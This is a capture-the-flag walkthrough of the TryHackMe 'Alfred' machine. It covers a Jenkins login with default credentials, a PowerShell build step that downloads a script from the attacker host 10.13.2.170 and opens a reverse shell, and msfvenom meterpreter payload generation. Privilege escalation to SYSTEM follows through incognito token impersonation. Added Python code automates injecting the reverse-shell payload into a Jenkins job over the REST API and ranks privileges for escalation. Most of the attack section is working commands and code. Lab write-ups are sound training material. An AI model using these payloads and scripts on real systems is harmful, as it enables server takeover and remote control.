THM - Alfred
March 6, 2022•655 words
Alfred
skibum 8/30/2020
Enumeration and initial shell
NMAP scan
nmap -sV -sT -Pn -oX nmap/intial <Machine_IP>

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 16:06 CDT
Nmap scan report for <Machine_IP>
Host is up (0.22s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE           VERSION
80/tcp   open  http              Microsoft IIS httpd 7.5
3389/tcp open  ssl/ms-wbt-server?
8080/tcp open  http              Jetty 9.4.z-SNAPSHOT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.91 seconds
There are two ports with web servers on them:
2.1. Port 80 just serves a RIP page for Bruce Wayne.
2.2. Port 8080 is a Jenkins login page. Check for default credentials.
Testing username:password admin:admin worked and granted access.
From the main menu select the project in the center, then Configure. This lets you edit the project's build step, which is a command executed on the underlying host by whatever account Jenkins runs as, so anyone who can configure a job can run code on the server. Set the build command to:
powershell iex (New-Object Net.WebClient).DownloadString('http://10.13.2.170:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.13.2.170 -Port 1337
Before building the project, host the script and start a listener on the attacking machine (the http.server default port 8000 matches the URL in the build command):
python3 -m http.server
nc -nlvp 1337
Build the project. A user shell is now available on the listener.
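The same "Configure, edit the build step, build" sequence can be driven over the Jenkins REST API instead of clicking through the UI. The block below is an added example and is not code from the original writeup or from Jenkins; it assumes Jenkins at http://<Machine_IP>:8080 with the admin:admin credentials found above and a freestyle job named "project" (a placeholder, use the job name shown on the dashboard). The XML manipulation runs offline against a constructed, trimmed config.xml; the network functions only run when pointed at a live target.

```python
"""Added example (not from the original writeup or from Jenkins): do the
"Configure -> build step" trick over the Jenkins REST API instead of the UI.
Assumptions (placeholders, not from the page): Jenkins at
http://<Machine_IP>:8080 with admin:admin and a freestyle job named "project".
"""
import base64
import json
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

JENKINS = "http://<Machine_IP>:8080"   # placeholder target, as in the writeup
JOB = "project"                        # assumption: the job shown on the dashboard
AUTH = "Basic " + base64.b64encode(b"admin:admin").decode()

# The same download cradle the writeup types into the build step.
PAYLOAD = ("powershell iex (New-Object Net.WebClient).DownloadString("
           "'http://10.13.2.170:8000/Invoke-PowerShellTcp.ps1');"
           "Invoke-PowerShellTcp -Reverse -IPAddress 10.13.2.170 -Port 1337")

# Constructed, trimmed freestyle job config.xml so the XML part runs offline.
SAMPLE_CONFIG = """<?xml version='1.0' encoding='UTF-8'?>
<project>
  <description></description>
  <keepDependencies>false</keepDependencies>
  <canRoam>true</canRoam>
  <builders/>
  <publishers/>
</project>
"""


def _root(config_xml):
    # ElementTree refuses str input that carries an encoding declaration,
    # and Jenkins always emits one, so parse bytes.
    if isinstance(config_xml, str):
        config_xml = config_xml.encode()
    return ET.fromstring(config_xml)


def add_batch_step(config_xml, command):
    """Return config.xml with an 'Execute Windows batch command' step appended.
    Jenkins stores that step as <hudson.tasks.BatchFile><command>."""
    root = _root(config_xml)
    builders = root.find("builders")
    if builders is None:
        builders = ET.SubElement(root, "builders")
    step = ET.SubElement(builders, "hudson.tasks.BatchFile")
    ET.SubElement(step, "command").text = command
    return ET.tostring(root, encoding="unicode")


def batch_commands(config_xml):
    """Commands a job will run on the host; handy when auditing a Jenkins
    instance for build steps someone has already planted."""
    return [s.findtext("command", "")
            for s in _root(config_xml).iter("hudson.tasks.BatchFile")]


def _request(path, data=None, headers=None):
    """GET, or POST when data is given, with HTTP basic auth."""
    hdrs = {"Authorization": AUTH}
    hdrs.update(headers or {})
    req = urllib.request.Request(JENKINS + path, data=data, headers=hdrs)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode()


def crumb_headers():
    """Jenkins rejects POSTs without a CSRF crumb; a 404 here means the crumb
    issuer is disabled and no crumb is needed."""
    try:
        crumb = json.loads(_request("/crumbIssuer/api/json"))
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return {}
        raise
    return {crumb["crumbRequestField"]: crumb["crumb"]}


def inject_and_build(command=PAYLOAD):
    """Fetch the job config, append the batch step, push it back, trigger a build."""
    config = _request(f"/job/{JOB}/config.xml")
    crumb = crumb_headers()
    xml_hdrs = dict(crumb, **{"Content-Type": "application/xml"})
    _request(f"/job/{JOB}/config.xml",
             data=add_batch_step(config, command).encode(), headers=xml_hdrs)
    _request(f"/job/{JOB}/build", data=b"", headers=crumb)  # empty POST starts a build


if __name__ == "__main__":
    inject_and_build()
```

batch_commands is the defensive half of the same code: run it over every job's config.xml on an instance you administer and any BatchFile step that downloads and executes something is exactly the artifact this writeup leaves behind.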
Priv esc
Generate a meterpreter payload:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.2.170 LPORT=9001 -f exe -o knockknock.exe
Download it onto the target from the shell (the same http.server is still serving the current directory):
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.2.170:8000/knockknock.exe','knockknock.exe')"
Set up exploit/multi/handler in msfconsole with the windows/meterpreter/reverse_tcp payload and the same LHOST and LPORT used for msfvenom (10.13.2.170:9001).
Run the handler in msfconsole, then execute the exe from the shell.
With the meterpreter session up, check the privileges of the account Jenkins runs as:
PS> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled
SeImpersonatePrivilege is enabled, so try token impersonation. Load the incognito extension in the meterpreter session:
load incognito
Then list the tokens available to this process:
list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WdiSystemHost
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\CryptSvc
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\LanmanWorkstation
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\netprofm
NT SERVICE\nsi
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\W32Time
NT SERVICE\WdiServiceHost
NT SERVICE\WinHttpAutoProxySvc
NT SERVICE\wscsvc
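The two outputs above are what decides the next step: a usable impersonation privilege on our own token plus a delegation token for a high-value group. The block below is an added example, not code from the original writeup; it parses trimmed copies of the writeup's own whoami /priv and list_tokens output (constructed sample input), flags the privileges that have a well-known escalation path (the shortlist is this editor's, not the page's), and reproduces the choice made by hand here. One detail worth noting: a privilege shown as Disabled is still held by the token and can be enabled by the process itself, so SeBackup, SeRestore, SeTakeOwnership and SeLoadDriver on this box are alternatives, not dead ends.

```python
"""Added example, not from the original writeup: triage `whoami /priv` and
incognito `list_tokens -g` output to decide whether the impersonation route
is open. Sample outputs are copied from the writeup and trimmed; the
privilege shortlist is the editor's own."""
import re

WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
"""

LIST_TOKENS = r"""
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
NT AUTHORITY\SERVICE
NT SERVICE\Schedule

Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\DcomLaunch
"""

# Privileges with a well-known route to SYSTEM. "Disabled" only means the
# process has not switched it on yet (AdjustTokenPrivileges can); a privilege
# absent from the list is the only kind that is really unavailable.
ESCALATION_PRIVS = {
    "SeImpersonatePrivilege": "impersonate a SYSTEM token (incognito, potato family)",
    "SeAssignPrimaryTokenPrivilege": "start a process with a stolen primary token",
    "SeDebugPrivilege": "open and inject into SYSTEM processes, dump LSASS",
    "SeBackupPrivilege": "read any file, e.g. the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file or registry key",
    "SeTakeOwnershipPrivilege": "take ownership of any object, then grant yourself access",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTcbPrivilege": "act as part of the operating system",
}

HIGH_VALUE_TOKENS = ("NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators")

_PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")


def parse_whoami_priv(text):
    """Map privilege name -> state from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = _PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def parse_list_tokens(text):
    """Split incognito `list_tokens -g` output into delegation and
    impersonation token names; warnings and separator lines are dropped."""
    tokens = {"delegation": [], "impersonation": []}
    section = None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("Delegation Tokens"):
            section = "delegation"
        elif line.startswith("Impersonation Tokens"):
            section = "impersonation"
        elif line and section and not line.startswith(("=", "[", "Call ")):
            tokens[section].append(line)
    return tokens


def escalation_candidates(privs):
    """Held privileges worth trying, with their current state and usual abuse."""
    return {p: (privs[p], why) for p, why in ESCALATION_PRIVS.items() if p in privs}


def pick_impersonation_target(privs, tokens):
    """The decision the writeup makes by hand: an impersonation privilege is
    held and a high-value delegation token exists, so impersonate that token."""
    if not any(p in privs for p in ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")):
        return None
    for name in HIGH_VALUE_TOKENS:
        if name in tokens["delegation"]:
            return name
    return None


if __name__ == "__main__":
    privs = parse_whoami_priv(WHOAMI_PRIV)
    for name, (state, why) in escalation_candidates(privs).items():
        print(f"{name:<32}{state:<10}{why}")
    print("impersonate:", pick_impersonation_target(privs, parse_list_tokens(LIST_TOKENS)))
```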
Since a BUILTIN\Administrators delegation token is available, impersonate it:
impersonate_token "BUILTIN\Administrators"
We are now NT AUTHORITY\SYSTEM. Impersonation only swaps the token on the current thread, and Windows checks many operations against the process's primary token rather than the impersonated one, so migrate into a process that already runs as SYSTEM to keep the access.
Use the ps command to list the processes and find the PID of services.exe, which runs as SYSTEM; it was 668 here. Now migrate into it:
migrate 668
P0wn3d!!! Now read the root.txt file at C:\Windows\System32\config.